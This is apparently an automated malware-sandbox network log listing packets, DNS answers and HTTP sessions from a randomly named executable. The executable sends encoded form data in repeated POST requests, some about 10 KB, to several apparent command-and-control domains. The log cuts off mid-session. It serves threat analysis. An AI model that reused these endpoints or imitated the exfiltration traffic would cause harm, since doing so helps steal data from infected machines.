                                                                                                                                                Nov 25, 2024 09:44:58.682893991 CET5003580192.168.2.4209.74.77.108
                                                                                                                                                Nov 25, 2024 09:44:58.802417994 CET8050035209.74.77.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:04.444755077 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:04.564189911 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:04.564277887 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:04.581717968 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:04.701195955 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:05.813123941 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:05.813189983 CET8050044185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:05.816414118 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:06.088476896 CET5004480192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.108553886 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.228725910 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:07.228815079 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.243805885 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:07.363357067 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:08.524236917 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:08.524315119 CET8050045185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:08.524374008 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:08.760586023 CET5004580192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:09.779345989 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:09.898895025 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:09.899029016 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:09.914906979 CET5004680192.168.2.4185.27.134.206
                                                                                                                                                Nov 25, 2024 09:45:10.035309076 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035330057 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035351992 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035397053 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.035407066 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036314964 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036324024 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036392927 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:10.036402941 CET8050046185.27.134.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:44.202023983 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.480539083 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:44.480618000 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.569355011 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:44.688949108 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806469917 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806530952 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806576014 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806618929 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806704044 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.806704044 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.806710005 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:45.806799889 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.812464952 CET5005580192.168.2.4217.160.0.200
                                                                                                                                                Nov 25, 2024 09:45:45.931976080 CET8050055217.160.0.200192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:52.085829020 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:52.205507040 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:52.206675053 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:52.221162081 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:52.340811968 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457506895 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457541943 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457556963 CET8050056107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:53.457941055 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:53.729157925 CET5005680192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:54.749511957 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:54.869066954 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:54.869155884 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:54.887394905 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:55.006968975 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.165836096 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.165909052 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.165923119 CET8050057107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:56.166119099 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:56.401070118 CET5005780192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.442753077 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.562331915 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.562457085 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.578844070 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:57.698550940 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698570013 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698626041 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698636055 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698709965 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698776007 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698786020 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698873997 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:57.698884010 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766074896 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766140938 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766155005 CET8050058107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:45:58.766191959 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:58.766237974 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:45:59.088553905 CET5005880192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.107939959 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.227518082 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:00.227742910 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.236850023 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:00.356594086 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.479526043 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.479587078 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.479615927 CET8050059107.167.84.42192.168.2.4
                                                                                                                                                Nov 25, 2024 09:46:01.480359077 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:01.483345985 CET5005980192.168.2.4107.167.84.42
                                                                                                                                                Nov 25, 2024 09:46:01.603518009 CET8050059107.167.84.42192.168.2.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
                                                                                                                                                Nov 25, 2024 09:45:52.082026005 CET1.1.1.1192.168.2.40x2cfdNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082026005 CET1.1.1.1192.168.2.40x2cfdNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082050085 CET1.1.1.1192.168.2.40x2cfdNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082050085 CET1.1.1.1192.168.2.40x2cfdNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:46:07.965703964 CET1.1.1.1192.168.2.40x32a1No error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 104.21.16.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:42:29.323622942 CET | 517 | OUT | GET /wq47/?ifzt=+qWmsYvD7OMlDEAEm/jaBDQSW8n+pKrv9iKIE2pdq1tK+kqvSnJEJbP2DMl6xw9oMdRXFlgn6DbTeTaaAs/qgaat4XAxW5JpuJNECjkmcyUCSAd0ff+SBDY=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.airrelax.shop
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:42:30.625463963 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Fri, 25 Oct 2024 07:07:09 GMT
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDVetU28pvZ34yHvxpWXSkTDrLK3GZY4KTcvrekEZG6yjfLNdbj2Uh03XrTe6i%2B27H4n49ja8Ogi1Rdb6chgfSukWlb8GlKvcL1Yvr%2Bkx55u9rn4ZQlfum6oUCKyIu8VGNphQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e8058833c2c0f4d-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1545&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=517&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 185.27.134.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:42:46.719499111 CET | 777 | OUT | POST /572a/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.amayavp.xyz
                                                                                                                                                Referer: http://www.amayavp.xyz/572a/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=sxXACchr8F0i51LiN2LLAGcPlTSVrvukAq7mLxYnjEUe4H2a2x9WzTn1Yh+3e7d8FrzSKTaKX3HSdTejKDialNwZlsGrb6/5rG2HYAP0RttLHx0lecPmRdbUMlwLgv/BVfIH7ZKMBHkMoum5CQwIIO8JWVXtAxHPRg8EhBEGOWXo4Qu+V6ubP2e7d6Cdg1RRAw==
Nov 25, 2024 09:42:48.000629902 CET | 683 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:47 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 185.27.134.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:42:49.382522106 CET | 797 | OUT | POST /572a/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.amayavp.xyz
                                                                                                                                                Referer: http://www.amayavp.xyz/572a/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=sxXACchr8F0i5VbiehnLIGcOgTSVyfugAqHmL0o3/hke9VeaxylWwTn1AR+yTbdJFr/aKWaKXznSdSujNwKZkdwM88GtDa/5rG2HYAaRRtlLHAEle9OUQdbTEFwLx//FVfJi7dKmBEcMos+5CFcJR+8PY1WdBiukXwtUpRsUJmSF5WjkELPMd26IA9Lpt2sYbxiOdx/MSQ4VDoBQgPcV3X8=
Nov 25, 2024 09:42:50.708312035 CET | 683 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:50 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 185.27.134.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:42:52.039318085 CET | 10879 | OUT | POST /572a/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.amayavp.xyz
                                                                                                                                                Referer: http://www.amayavp.xyz/572a/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Data Ascii: ifzt= [TRUNCATED]
Nov 25, 2024 09:42:53.318517923 CET | 683 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:53 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49745 | 185.27.134.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:42:54.690721989 CET | 515 | OUT | GET /572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5PXCDqoRSfvUw6rLDaKlN9Kt5+gU7jSjDaWWRyTQ8pSIxkDCsHDSL4=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:42:56.021442890 CET | 1174 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:55 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 973
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("06dcab5f8942e5ac4ac00564a9fea9bf");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5PXCDqoRSfvUw6rLDaKlN9Kt5+gU7jSjDaWWRyTQ8pSIxkDCsHDSL4=&qX=qP0hoZO0bjg4&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49753 | 74.48.143.82 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:02.232209921 CET | 780 | OUT | POST /ykn4/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.bpgroup.site
                                                                                                                                                Referer: http://www.bpgroup.site/ykn4/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=/Ba1D0GPszZVOiAZCC7AMmofE0AZ5g7+64EfKhMly1wA4Db6PnWWz2tAvVmRQNWHKNKbEt8xoUIrd5hjxHvLcm9LPcYrkh0tEUHQLUHEyJrTaSCM68CSU/nXhQ0yjhoddnW8VwARmjzLlQxsfa7PzQjZmGdE507c1PrvKJYF59nNoOLehXKKVuUDkXG2quDC5w==
Nov 25, 2024 09:43:03.384166956 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:43:04 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:43:03.384260893 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49759 | 74.48.143.82 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:04.897916079 CET | 800 | OUT | POST /ykn4/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.bpgroup.site
                                                                                                                                                Referer: http://www.bpgroup.site/ykn4/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=/Ba1D0GPszZVMCQZEhjANGoeLUAZjQ7A64AfKgI1yAAA5m36dzCW9WtAg1meNdW2KN2pEvoxoX0rd4Rjy0HId29NXsY17R0tEUHQLUjuyIDTahKMoNCRX/nW2g0ynhoZdnWeVxc3mhbLlRBsfva9mAiSiGcR81G1yuWaCrIXxpXgpIGEwmrdHuww5QPCnt+LizZbEc86TK1Zwv9uKTenTl0=
Nov 25, 2024 09:43:06.154476881 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:43:06 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:43:06.154603958 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49766 | 74.48.143.82 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:07.554625988 CET | 10882 | OUT | POST /ykn4/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.bpgroup.site
                                                                                                                                                Referer: http://www.bpgroup.site/ykn4/
